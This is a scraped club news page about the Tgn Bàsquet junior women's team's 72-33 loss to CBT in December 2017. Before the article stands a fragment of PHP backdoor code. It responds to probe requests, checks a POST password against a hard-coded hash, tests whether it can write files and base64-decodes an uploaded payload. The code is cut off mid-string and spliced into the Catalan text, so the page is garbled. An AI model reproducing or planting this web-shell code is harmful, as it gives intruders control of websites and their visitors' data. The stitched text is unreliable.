function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El júnior femení fa un dels pitjors partits de la temporada i perd contra el CBT (72-33) - Tgn Bàsquet Club -

El júnior femení fa un dels pitjors partits de la temporada i perd contra el CBT (72-33)

Updated: desembre 19, 2017

L’equip júnior femení del TGN Bàsquet va patir una derrota molt clara a la pista del CBT. El conjunt que entrena Jordi Crespo va fer un molt mal inici i el seu rival ho va aprofitar per obrir forat al marcador. Així, al final del primer període el resultat era de 23-9 i al descans el desavantatge encara era més gran: 35-11. Tot semblava perdut i, de fet, el tercer quart ho va certificar. Sense esma i amb el llast del resultat a sobre, el TGN Bàsquet va encaixar un altre parcial dolorós i va afrontar l’últim quart 38 punts per sota (57-19). Els últims deu minuts, això sí, van servir perquè les liles mostressin l’orgull i l’amor propi i plantessin cara.